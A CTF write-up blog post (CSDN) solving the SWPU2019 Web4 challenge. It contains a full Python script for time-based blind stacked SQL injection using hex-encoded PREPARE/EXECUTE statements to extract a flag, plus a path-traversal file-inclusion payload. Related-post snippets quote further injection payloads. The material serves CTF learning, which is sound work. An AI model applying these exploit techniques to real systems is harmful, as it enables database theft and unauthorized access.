[SWPU2019]Web4

最新推荐文章于 2021-08-13 22:25:39 发布
最新推荐文章于 2021-08-13 22:25:39 发布
阅读量463 收藏 1
点赞数
分类专栏: sql注入 # ctf做题记录 代码审计 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/116126264
版权

场景
在这里插入图片描述
点登陆没反应,注册提示未开发,猜测sql注入。
在这里插入图片描述
抓包在username里添加单引号报错,闭合后提示:
在这里插入图片描述
参考wp是要堆叠注入,并且过滤了很多关键字,需要用十六进制和预处理语句注入。
PDO场景下的sql注入

import time
import requests
import json


def str_to_hex(str):
    return ''.join(hex(ord(c)).replace('0x', '') for c in str)

def binary(iterator, cu ,comparer):
    time.sleep(0.5)#必须要加,也不知道为什么,也不是429,但不加就乱码,而且要多跑几次
    startTime = time.time()
    waitSeconds = 2  # 等待时间
    checkSeconds = 0.2  # 容忍时间
    target = 'http://0a5d1c32-a986-4421-ab81-fba57cded578.node3.buuoj.cn/index.php?r=Login/login'
    payload = "a';SET @a=0x{0};PREPARE run from @a;EXECUTE run-- -"
    datas = {"username" : payload.format(str_to_hex("select if(ascii(substr((select flag from flag),{},1)){comparer}{},sleep({}),1)".format(iterator, cu, waitSeconds, comparer=comparer))), "password" : "123"}
    r = requests.post(target, data=json.dumps(datas))
    # print(r.text)
    # print(r.status_code)
    if (abs(time.time() - startTime - waitSeconds) < checkSeconds):
        return True
    else:
        return False

def test(iterator):
    l = 0
    r = 255
    while (l <= r):
        cu = (l + r) // 2
        if (binary(iterator, cu, "<")):
            r = cu - 1
        elif (binary(iterator, cu, ">")):
            l = cu + 1
        elif (cu == 0):
            return None
        else:
            return chr(cu)


def main():
    print("(+) 程序开始")
    finalRes = ""
    iterator = 1
    while (True):
        extracted_char = test(iterator)
        if (extracted_char == None):
            break
        finalRes += extracted_char
        iterator += 1
        print("(+) 当前结果:{}".format(finalRes), end="\r\n")
    print("(+) 运行完成,结果为:", finalRes)



if __name__ == '__main__':
    main()

结果glzjin_wants_a_girl_friend.zip可以下载到源码。
接下来是审计了,直接看的官方wp。
在这里插入图片描述
在BaseController.php下存在变量覆盖和文件包含。
在这里插入图片描述
UserController.php下发现actionIndex可控。视图是userindex.php
在这里插入图片描述
payload:
?r=User/Index&img_file=/../flag.php

fmyyy1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
[SWPU2019]Web4 盲注+代码审查
qq_54929891的博客
05-21 810
开始用dirsearch扫描了一下后台,发现没扫出啥玩意儿,或许是一个注入题(又到我的弱处了),先常规的使用 ' ; # 来判断一下 发现当我们只输入1'的时候发现是一个函数文件CBTool.php报错,而1的时候是一个正常的echo错误 看来username确实存在注入点,但不知道是哪个方面的注入 ,试了一下异或,盲注都不行,又超出我注入浅薄的知识了,学习得知一个方法:当输入1'报错,但是1"没有报错的话,那就是堆叠注入了,然后我试了一下最基本的一些堆叠注入,发现都被过滤了,真是有点严啊…… ...
BUUCTF:[SWPU2019]Web4
末初的CSDN博客
03-30 2720
[SWPU2019]Web4 参考:https://www.anquanke.com/post/id/194640#h3-4 题目只有一个登录框,输入账号密码后点击登陆页面无任何相应,注册功能也是尚未开放。查看源代码可以看到一个js文件,F12也可以看到一个网络请求。 js主要功能是将username和password以json格式然后发给index.php?r=Login/Login。 不难发...
[SWPU2019]Web1
qq_42812036的博客
02-15 850
0x00:知识点 MariaDB的SQL注入 无表名,列转换成行注入 0x01:解题 查表名: -1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22...
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
毕设&课设&项目&实训-SWPU数据库原理及应用大作业《西柚外卖订餐系统》基于Python+Flask+MySQL开发.zip
02-10
毕设&课设&项目&实训-本项目为SWPU数据库原理及应用大作业《西柚外卖订餐系统》,基于Python+Flask+MySQL开发 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发...
毕设&课程作业_SWPU数据库原理及应用大作业《西柚外卖订餐系统》,基于Python+Flask+MySQL开发.zip
01-22
4. 支付处理:虽然描述中未明确提及支付功能,但一个完整的订餐系统通常会包含支付接口,可以是模拟支付或集成第三方支付平台如支付宝、微信支付。 5. 订单状态跟踪:用户可以查看订单状态,如待支付、处理中、已...
本项目为SWPU数据库原理及应用大作业《西柚外卖订餐系统》,基于Python+Flask+MySQL开发,轻量简洁.zip
最新发布
04-19
自1998年首次发布以来,MySQL以其卓越的性能、可靠性和可扩展性,成为全球范围内Web应用程序、企业级解决方案以及其他各种数据处理场景的首选数据库平台之一。 以下是对MySQL数据库的详细介绍: 核心特性与优势 ...
详解2016 SWPU CTF web4
一个码农的笔记
10-31 3538
2016年的swpu结束了,很精彩,我玩的很开心 这个题目我在比赛的时候没有做出来,后来根据官方的wp复现了一遍,学到很多东西,官方的wp地址是:http://bobao.360.cn/ctf/detail/173.html 官方给的web4的题解不是特别详细 现在我详细的讲解一下web4,我会详细讲解web4所有的知识点 首先网站有源码泄露,在:web4.08067.me/web/w
PDO预处理&& [SWPU2019]Web4
Je3Z的博客
08-13 172
PDO场景下的SQL注入探究 例题 [SWPU2019]Web4 参考 由于题目对username进行了严格的检测,所以无法使用单语句进行注入,但是注入点又存在,于是可以尝试进行堆叠注入。(很多师傅可能就因为不友好的回显卡在这里) 思路 我们但加'报错,然后后面加#正常了,然后我们再尝试了';回显也是正常的,若无法多语句执行,返回页面按理说应该是500,这个正常说明开启了堆叠注入,所以可以联想到想到预处理 import requests,time import json def str_to_hex
[SWPU2019]Web6
lllffg的博客
03-16 720
[SWPU2019]Web6 SQL注入中的with rollup 利用session.upload_progress进行文件包含和反序列化渗透 一个登陆页面,尝试一下1’ and sleep(4)#后弹出被过滤的回显,然后怎么都没思路,然后输入了下万能密码1’ or 1=1 or ‘1’='1,回显了passwd错误,这证明只对passwd进行的检测 看了下wp 猜测源码太狠了 $sql="select * from users where username='$name' and passwd='$
[网鼎杯2018]Unfinish
fmyyy1的博客
04-15 2215
场景 既然有login.php那就会有register.php,访问。 注册一个账号进去。 登录进去后看到我们的用户名了。 猜测在用户名处存在二次注入,再注册一个账号。 用户名变成了0,证明存在二次注入。 fuzz之后发现逗号,information等许多关键字被过滤了。 绕过方法: mysql中,+只能当做运算符。 执行select '1'+'1a'时 结果 执行select '0'+database(); 编程了0,但我们可以用ascii编码进行计算。 select '0'+ascii(
[HFCTF2020]EasyLogin
fmyyy1的博客
04-13 2018
对js不是很了解,这题边看wp边学。 是一个登录界面。 注册一个账号登录 flag没有显示,看源码。 看到了app.js,访问可看到源码。 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val(); const password = $("#password").val(); const token =
[极客大挑战 2020]Greatphp
fmyyy1的博客
05-22 1355
知识点 php原生类的利用 源码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值